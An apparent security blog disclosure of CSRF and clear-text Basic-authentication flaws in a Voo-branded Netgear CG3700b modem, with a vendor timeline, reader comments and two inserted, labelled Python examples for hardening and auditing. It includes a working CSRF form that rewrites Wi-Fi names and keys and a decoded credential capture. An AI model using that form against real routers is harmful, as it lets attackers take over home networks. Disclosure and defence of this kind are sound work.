Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.
Voo branded Netgear CG3700b Vulnerabilities – Introduction
As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.
CVEs are still pending, but I will add them to this post when I receive them.
Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration settings (/goform/
Before settings:
Example CSRF form:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
  <input type="hidden" name="group_parametrage_wifi" value="active">
  <input type="hidden" name="reseau_wifi_name" value="NEWSSID">
  <input type="hidden" name="nom_select" value="AUTO-PSK">
  <input type="hidden" name="canal" value="0">
  <input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
  <input type="hidden" name="NBandwidth" value="20">
  <input type="hidden" name="group_parametrage_wifi_an" value="active">
  <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
  <input type="hidden" name="nom_select_an" value="AUTO-PSK">
  <input type="hidden" name="canal_an" value="0">
  <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
  <input type="hidden" name="NBandwidth_an" value="20">
  <input type="hidden" name="group_fon" value="desactiver">
  <input type="hidden" name="buttonApply" value="1">
  <input type="hidden" name="only_mode" value="0">
  <input type="hidden" name="selected_ch_an" value="1">
</form>
After CSRF:
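The PoC form above works because the /goform/ handlers accept any well-formed POST, with nothing that ties the request to the admin's own session or to the device's origin. The following is an added example (not the modem's firmware code, and not part of the original post) that models the handler both ways in Python: a stand-in `handle_post_vulnerable` that behaves as the post describes, and `handle_post_hardened` that refuses the same cross-site submission by checking the Origin/Referer header against the device origin and requiring a per-session token. The in-memory token store, the session id and the attacker origin are assumptions made for the demonstration; the field names are the ones from the PoC form.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Origin of the modem's own admin UI, as used in the post's PoC form.
DEVICE_ORIGIN = "http://192.168.0.1"

# Hypothetical server-side token store: session id -> CSRF token.
_tokens: dict[str, str] = {}


def issue_csrf_token(session_id: str) -> str:
    """Mint a fresh unguessable token for a session and remember it server-side."""
    token = secrets.token_urlsafe(32)
    _tokens[session_id] = token
    return token


def apply_wifi_settings(fields: dict) -> dict:
    """Stand-in for what /goform/index does with the form: return the settings it would apply."""
    return {
        "ssid": fields.get("reseau_wifi_name", [""])[0],
        "psk": fields.get("mot_de_passe", [""])[0],
    }


def handle_post_vulnerable(headers: dict, body: str) -> dict:
    """Behaviour described in the post: any POST carrying the right field names is applied."""
    return {"status": 200, "applied": apply_wifi_settings(parse_qs(body))}


def handle_post_hardened(headers: dict, body: str, session_id: str) -> dict:
    """Same handler with two checks a browser will not satisfy for a cross-site form post."""
    fields = parse_qs(body)

    # 1. Origin (or Referer) must name the device itself. A form submitted from
    #    another site carries that site's origin, so it is refused.
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return {"status": 403, "error": "missing Origin/Referer"}
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != DEVICE_ORIGIN:
        return {"status": 403, "error": "cross-origin request"}

    # 2. The form must carry the session's token, which the attacker's page cannot read.
    #    Compare in constant time so a mismatch leaks nothing about the expected value.
    submitted = fields.get("csrf_token", [""])[0]
    expected = _tokens.get(session_id, "")
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return {"status": 403, "error": "bad CSRF token"}

    return {"status": 200, "applied": apply_wifi_settings(fields)}


# Constructed request body mirroring the PoC form (only the fields this demo reads).
ATTACK_BODY = (
    "group_parametrage_wifi=active&reseau_wifi_name=NEWSSID"
    "&mot_de_passe=NEWWPAKEY&buttonApply=1"
)


def demo() -> tuple:
    """Replay the cross-site POST against both handlers, then a legitimate same-origin one."""
    session_id = "demo-session"  # assumed session id of a logged-in admin
    cross_site_headers = {"Origin": "http://attacker.example"}  # assumed attacker origin
    vuln = handle_post_vulnerable(cross_site_headers, ATTACK_BODY)
    hard = handle_post_hardened(cross_site_headers, ATTACK_BODY, session_id)

    token = issue_csrf_token(session_id)
    legit = handle_post_hardened(
        {"Origin": DEVICE_ORIGIN}, ATTACK_BODY + "&csrf_token=" + token, session_id
    )
    return vuln, hard, legit


if __name__ == "__main__":
    for label, result in zip(("vulnerable", "hardened", "legitimate"), demo()):
        print(label, result)
```

Either check on its own already defeats the PoC form; the token is the one that also covers clients that send no Origin or Referer header at all, which is why the hardened handler insists on both.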
Insufficient Authentication (OWASP-A2)
This same modem handles authentication via HTTP basic authentication over the default (HTTP, non-SSL) connection. This allows an attacker to trivially decode the base64-encoded username and password and authenticate to the router. It only requires that the attacker be on the same network as the router and sniff the clear-text traffic.
Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
Screenshot:
root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD
Insufficient Authentication (OWASP-A2)
The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.
If a WPA2 flaw were found that made cracking the key simple, if the HTTP basic authentication were brute-forced (the key uses a known charset of A-Z and is 8 characters long), or if some other vulnerability were found, then both systems would fail instead of just one.
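Both of the findings above (credentials sent as Basic auth over plain HTTP, and the same secret serving as admin password and WPA key) are things a network owner can audit for from a capture of their own LAN traffic. The following is an added example, not part of the original post or of any vendor tooling: a small Python auditor that parses captured HTTP requests, flags any Basic credentials seen on a non-TLS connection, reports the username with the password masked, and checks whether that password is also the configured Wi-Fi key. The capture is constructed for the example from the request shown in the post (the Authorization header is the one printed there); the `wifi_key` argument, the `tls` flag and the keyspace helper are assumptions made for the demonstration.

```python
import base64
import binascii
import hmac
import math
from typing import Optional

# Constructed capture: the post's request (header values as shown there) plus one
# request that carries no credentials, to show the auditor skips it.
CAPTURED_REQUESTS = [
    "POST http://192.168.0.1/goform/parametre_config HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "Connection: keep-alive\r\n"
    "Authorization: Basic dm9vOlBBU1NXT1JE\r\n\r\n",
    "GET http://192.168.0.1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
]


def parse_request(raw: str) -> tuple[str, dict]:
    """Split a raw HTTP request into its request line and a lower-cased header dict."""
    request_line, _, rest = raw.partition("\r\n")
    headers: dict = {}
    for line in rest.split("\r\n"):
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def extract_basic_credentials(headers: dict) -> Optional[tuple[str, str]]:
    """Return (user, password) from a Basic Authorization header, or None if absent/malformed."""
    scheme, _, blob = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def audit_capture(requests: list, wifi_key: str, tls: bool = False) -> list:
    """Flag Basic credentials sent in the clear and reuse of that password as the WPA key.

    `tls` says whether the captured socket was TLS-protected (assumed False for this
    modem's default HTTP UI). Absolute-form targets starting with http:// are always
    treated as clear-text.
    """
    findings = []
    for raw in requests:
        request_line, headers = parse_request(raw)
        creds = extract_basic_credentials(headers)
        if creds is None:
            continue
        user, password = creds
        parts = request_line.split(" ")
        target = parts[1] if len(parts) > 1 else ""
        findings.append({
            "request": request_line,
            "user": user,
            # Never write the secret itself into an audit report; keep only the first character.
            "password_masked": password[:1] + "*" * max(len(password) - 1, 0),
            "cleartext": (not tls) or target.startswith("http://"),
            # Constant-time comparison against the Wi-Fi key to detect credential reuse.
            "reused_as_wifi_key": hmac.compare_digest(password.encode(), wifi_key.encode()),
        })
    return findings


def keyspace_bits(alphabet_size: int = 26, length: int = 8) -> float:
    """Entropy in bits of a password drawn uniformly from the given charset and length.

    Defaults model the post's 'A-Z, 8 characters' default key.
    """
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    for finding in audit_capture(CAPTURED_REQUESTS, wifi_key="PASSWORD"):
        print(finding)
    print(f"default key space: about {keyspace_bits():.1f} bits")
```

Run against a real capture, the `wifi_key` argument would be the passphrase from the device's own configuration page; a `reused_as_wifi_key` hit is the single-point-of-failure the post describes, and any `cleartext` hit means the admin password has already been exposed to everyone on that network segment.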
Disclosure Timeline
- 2016-01-22 – Discovered vulnerability, initially notified vendor.
- 2016-01-23 – Requested CVE.
- 2016-03-07 – Contacted vendor again, they notified me that they will not fix these issues at this time.
- 2016-04-20 – Attempted to contact Mitre again to receive CVE.
- 2016-04-21 – Sent to Full Disclosure.
- 2016-04-23 – Additional information and full disclosure published here.
- 2016-04-26 – Resent to Full Disclosure due to some errors.
- 2019-06-20 – Requested CVEs again with the new form.
Voo branded Netgear CG3700b Vulnerabilities – Conclusion
All in all, a fun weekend, and a few good findings.
The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.
I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.
Hello,
I read “2019-06-20 – Requested CVEs again with the new form.”
Do you know if the vulnerabilities are still present in V2.03.03? It has been deployed approximately in 2017 by VOO (i.e. about one year after your report about 2.02.x). See e.g. https://forum.voo.be/ma-connexion-internet-17/interface-du-modem-netgear-bug-7852#post69290
I have access to one such upgraded device if you like. (I mean you may or not still live in Belgium.)
Thank you for your investigation and blog post
Regards
O.
I’m actually not sure, as I moved away from Belgium!
That said, it should be easy enough to see if they still exist, based on this post alone.
If you have any questions or information, then please let me know.